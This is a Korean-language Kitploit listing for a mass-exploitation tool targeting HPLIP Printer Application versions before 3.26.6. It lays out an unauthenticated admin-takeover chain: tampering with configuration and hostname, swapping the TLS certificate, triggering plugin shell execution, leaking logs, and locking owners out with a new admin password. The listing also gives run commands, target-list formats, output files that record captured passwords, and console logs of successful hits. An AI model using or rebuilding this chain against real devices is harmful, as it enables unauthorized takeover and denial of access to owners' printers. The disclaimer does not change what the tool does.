Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-91097-CVE-2026-91106 — HPLIP < 3.26.6 — PAPPL 웹 인터페이스를 통한 완전한 관리자 권한 탈취 (인증 없음). CVE-2026-91097부터 CVE-2026-91106까지 관련 (CVSS 9.3) | Kitploit
도구/GitHubGitHub/nxploited/cve-2026-91097-cve-2026-91106
Defensive ToolsVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPost-ExploitationWeb SecurityNetwork SecurityPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubnxploited/cve-2026-91097-cve-2026-91106

CVE-2026-91097-CVE-2026-91106

HPLIP < 3.26.6 — PAPPL 웹 인터페이스를 통한 완전한 관리자 권한 탈취 (인증 없음). CVE-2026-91097부터 CVE-2026-91106까지 관련 (CVSS 9.3)

저장소 보기
41일 전아직 검토되지 않음

Affected Auth Impact

🔬 최신 취약점 연구 및 익스플로잇 릴리스를 위해 Telegram에 참여하세요
Telegram


HPLIP 프린터 애플리케이션 — 인증 없는 관리자 탈취

3.26.6 이전 모든 HPLIP 버전의 HPLIP 프린터 애플리케이션(PAPPL 기반 웹 인터페이스)을 대상으로 하는 대량 익스플로잇 도구입니다. 이 도구는 PAPPL 웹 인터페이스의 기본 무인증 상태를 악용하여 전체 관리자 탈취 체인을 수행합니다: 설정 변조, 호스트 이름 변경, TLS 인증서 교체, HP 플러그인 설치(대상에서 .run 파일의 셸 실행을 트리거), 시스템 로그 유출, 그리고 관리자 비밀번호 잠금입니다.

이 도구가 악용하는 것

핵심 취약점은 PAPPL 무인증 관리자 접근입니다 — HPLIP 프린터 애플리케이션은 기본적으로 비밀번호가 설정되어 있지 않아, 모든 네트워크 공격자가 웹 인터페이스(일반적으로 포트 8000)를 통해 인증 없이 모든 관리 작업을 수행할 수 있습니다.

또한 플러그인 설치 체인은 다음에서 다루는 약점을 활용합니다:

CVECWECVSS 4.0관련성
CVE-2026-91097CWE-94 / CWE-7877.0plugin.spec의 경로 순회 — 이 도구가 트리거하는 플러그인 설치가 취약한 pluginhandler.py 코드를 통과합니다
CVE-2026-91102CWE-78 / CWE-4948.4무결성 검사 없는 다운로드 — 플러그인 .run 파일이 HTTP를 통해 다운로드되어 대상에서 sh로 실행됩니다

HP 보안 공지: HPSBPI04151

악용되는 엔드포인트

익스플로잇 체인

root@kitploit:~
Target Discovery
    │
    ▼
Detect HPLIP Printer Application (Server header + version)
    │
    ▼
Check Authentication Status (/security)
    │
    ├── Password Set ──► Log as VULN (locked)
    │
    └── No Password (default) ──► Exploit Chain:
            │
            ├── 1. Modify Configuration (/config)
            │       dns_sd_name, location, organization, contact_name
            │       Verified: marker reflected in response
            │
            ├── 2. Change Hostname (/network)
            │       Old hostname captured, new hostname set
            │       Verified: new value reflected in response
            │
            ├── 3. Upload TLS Certificate (/tls-install-crt)
            │       Custom PEM certificate + private key
            │       Multipart file upload
            │
            ├── 4. Install HP Plugin (/plugin)
            │       Step 1: POST action=install-plugin (downloads .run)
            │       Step 2: POST action=license-accepted (executes with sh)
            │       ⚠ CVE-2026-91097 + CVE-2026-91102
            │
            ├── 5. Read Log File (/logfile.txt)
            │       System paths, environment info, Snap paths
            │
            └── 6. Set Admin Password (/security)
                    Locks out further unauthenticated access
                    Completes full admin takeover

설치

root@kitploit:~
pip install requests

Python 3.8+ 필요. 다른 의존성은 없습니다.

사용법

명령줄

root@kitploit:~
python T.py targets.txt 50
인수설명기본값
targets.txt대상 목록이 포함된 파일 (한 줄에 하나)프롬프트로 입력
50동시 스레드 수15

대화형 모드

root@kitploit:~
python T.py

도구가 대상 목록 파일과 스레드 수를 입력하라는 프롬프트를 표시합니다.

대상 형식

root@kitploit:~
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
  • 포트를 지정하지 않으면 기본값은 8000입니다
  • 스킴을 지정하지 않으면 HTTP와 HTTPS를 모두 시도합니다
  • 중복 대상은 자동으로 제거됩니다
  • #로 시작하는 줄은 무시됩니다

출력 파일

예시 — AdminS.txt

root@kitploit:~
http://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...

예시 — Nx_modify.txt

root@kitploit:~
http://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123

콘솔 출력

root@kitploit:~
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

   ██████   ██ ██   ██
   ██  ███  ██  ██ ██
   ██   ██████   ███
   ██    █████  ██ ██
   ██     ████ ██   ██

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  HPLIP Printer Application  │  Admin Takeover + Full Control
  Affected < 3.26.6  │  PAPPL Unauthenticated Access

  CVE-2026-91097  │  Plugin Path Traversal
  CVE-2026-91102  │  Plugin Download Without Integrity + Shell Exec

  Exploited via Web:  /security /config /network /plugin /tls-install-crt /logs

  By: Nxploited ( Khaled Alenazi )  │  Telegram: @Kxploit
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

 targets=4  threads=4

 00:11:34  [CUPS  ]  http://192.168.1.100:8000  Server: HPLIP_Printer_Application/3.22.10-13
 00:11:34  [VER   ]  http://192.168.1.100:8000  v3.22.10 < 3.26.6 AFFECTED
 00:11:35  [PROBE ]  http://192.168.1.100:8000  v3.22.10 | NO AUTH | exploiting...
 00:11:36  [CFG   ]  http://192.168.1.100:8000  CONFIG MODIFIED | marker=abc12345
 00:11:37  [NET   ]  http://192.168.1.100:8000  HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
 00:11:38  [CERT  ]  http://192.168.1.100:8000  TLS CERT UPLOADED | marker=abc12345
 00:12:03  [PLG   ]  http://192.168.1.100:8000  PLUGIN | freshly_installed | shell_exec=True
 00:12:05  [LOG   ]  http://192.168.1.100:8000  logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
 00:12:05  [ADMIN ]  http://192.168.1.100:8000  PASSWORD SET | pw=Nx-zD_buovl6wko0
 00:12:05  [HIT   ]  http://192.168.1.100:8000  v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN

 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 DONE  4/4  █ HIT=4  █ VULN=0  █ SAFE=0  █ SKIP=0

 ▐ Admin Takeover: 4  └─ AdminS.txt
 ▐ Modifications : 8  └─ Nx_modify.txt
 ▐ Cert Uploads  : 4  └─ Nx_upload.txt
 ▐ Plugin Exec   : 1  └─ Nx_plugin.txt
 ▐ Recon / Info  : 8  └─ Nx_recon.txt
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

대상 분류

태그의미
HIT익스플로잇 성공 — 관리자 탈취 달성
VULN

기술 노트

  • HPLIP 프린터 애플리케이션은 Ubuntu 기반 시스템에서 Snap 패키지로 실행되며, 데이터는 /var/snap/hplip-printer-app/common/ 아래에 저장됩니다
  • PAPPL 프레임워크는 TLS 작업에 GnuTLS를 사용합니다 (C API, 셸 명령 아님) — TLS 인증서 업로드는 디스크에 기록되지만 코드 실행을 트리거하지 않습니다
  • 플러그인 설치는 sh plugin.run --keep --nox11을 트리거하여 HP의 공식 플러그인 바이너리를 실행합니다 — 콘텐츠는 HP 서버에서 다운로드되며, 공격자는 플러그인 콘텐츠를 제어하지 않고 그 실행만 트리거합니다
  • 이 도구는 재익스플로잇을 방지하기 위해 대상별로 고유한 비밀번호를 설정하고 검증을 위해 자격 증명을 기록합니다
  • 각 설정 변경은 수정이 적용되었는지 확인하기 위해 서버 응답에서 검증되는 무작위 마커를 사용합니다
  • 임의 RCE는 없습니다 — 이 도구는 웹 셸을 업로드하거나 임의 명령을 주입하지 않습니다; 악용 가능한 동작은 관리자 탈취, 설정 변조, 인증서 교체, HP 플러그인 실행, 그리고 정보 노출입니다

참고 자료

  • HP Security Bulletin HPSBPI04151
  • NVD — CVE-2026-91097
  • NVD — CVE-2026-91102
  • HPLIP Release Notes
  • PAPPL Framework

By: Nxploited


⚠️ 면책 조항

이 도구는 승인된 보안 연구, 침투 테스트, 그리고 교육 목적으로만 엄격히 제공됩니다. 시스템 소유자의 명시적인 서면 허가 없이 이 도구를 시스템에 사용하는 것은 불법이며 비윤리적입니다. 저자는 이 도구의 사용으로 인해 발생하는 어떠한 오용, 손해, 또는 법적 결과에 대해서도 책임을 지지 않습니다. 보안 평가를 수행하기 전에 항상 적절한 승인을 받으십시오. 이 도구를 사용함으로써 귀하는 자신의 행동과 모든 관련 법률 및 규정 준수에 대한 전적인 책임이 귀하에게 있음에 동의합니다.

도구 다운로드
엔드포인트동작검증됨
/security관리자 비밀번호 설정 (계정 탈취)✅
/configDNS-SD 이름, 위치, 조직, 연락처 수정✅
/network시스템 호스트 이름 변경✅
/tls-install-crt임의의 TLS 인증서 + 개인 키 업로드✅
/pluginHP 플러그인 다운로드 + 라이선스 동의 + 설치 트리거 (.run을 sh로 실행)✅
/logfile.txt전체 애플리케이션 로그 파일 읽기 (정보 노출)✅
파일내용
AdminS.txt관리자 탈취 — 비밀번호, 서버 버전, 전체 패널 URL 맵
Nx_modify.txt검증된 설정 및 호스트 이름 변경 (이전 → 새 값)
Nx_upload.txtTLS 인증서 업로드 확인
Nx_plugin.txt셸 실행 상태를 포함한 HP 플러그인 설치 결과
Nx_recon.txt정보 노출 — 로그 파일 크기, 환경 경로, 버전
취약하지만 비밀번호가 이미 설정됨 (잠김)
SAFE버전 ≥ 3.26.6 (패치됨)
SKIPHPLIP 프린터 애플리케이션이 아니거나 연결 불가